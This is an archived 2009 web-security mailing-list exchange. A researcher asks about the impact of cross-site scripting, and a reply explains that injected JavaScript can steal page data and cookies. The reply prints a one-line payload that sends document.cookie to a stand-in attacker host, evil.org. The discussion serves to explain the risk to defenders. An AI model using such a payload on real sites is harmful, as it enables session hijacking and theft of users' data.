[WEB SECURITY] XSS Impact

Porttikivi, Anssi anssi.porttikivi at kpmg.fi
Wed Jan 14 04:00:49 EST 2009


It is good to remind everybody here with the most common, basic
motivation for XSS exploitation. If the attacker can control the
javascript that is sent to victim browser, attacker can inject to the
victim (you can try this schema in your browser URL input field):
 
    javascript:document.location="http://evil.org?x
<BLOCKED::http://evil.org?x> =" + document.cookie
 
Or the attacker could replace "document.cookie" with any other
Javascript construct, having access to all the data on the page that DOM
defines, then sending it to evil.org as URL parameters. 
 
So the peculiar risk andf impact of XSS is that all the data on the page
plus cookies of that site can be stolen. It is up to the cleverness of
the attacker, what is done with that data:  stealing authentication
info, triggering malware downloads, doing XSRF or anything.


________________________________

	From: Pete Lindstrom [mailto:petelind at spiresecurity.com] 
	Sent: 14. tammikuuta 2009 2:32
	To: websecurity at webappsec.org
	Subject: [WEB SECURITY] XSS Impact
	
	

	Greetings -

	 

	I am trying to get my arms around the cross-site scripting
vulnerability impact and can only come up with it as an enabler of other
exploits. Can you give me your best (highest impact) examples of what an
XSS vuln can do without combining with other exploit techniques?

	 

	Thanks,

	 

	Pete

	 

	Pete Lindstrom

	Research Director

	Spire Security

	610-644-9064

	blog: http://spiresecurity.typepad.com

	 

	 


The information in this e-mail (and any attachments) is intended exclusively for the addressee(s). Any use by a party other than the addressee(s) is prohibited. The information may be confidential in nature and fall under a duty of non-disclosure. If you are not the addressee, please notify the sender and delete this e-mail. KPMG cannot guarantee that e-mail communications are secure or error-free, as information could be intercepted, corrupted, amended, lost, destroyed, arrive late or incomplete, or contain viruses. Any opinions or advice contained in this e-mail are subject to the terms and conditions expressed in the governing KPMG client engagement letter. Please consider the environment before printing this email.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20090114/d11fc9f9/attachment.html>


More information about the websecurity mailing list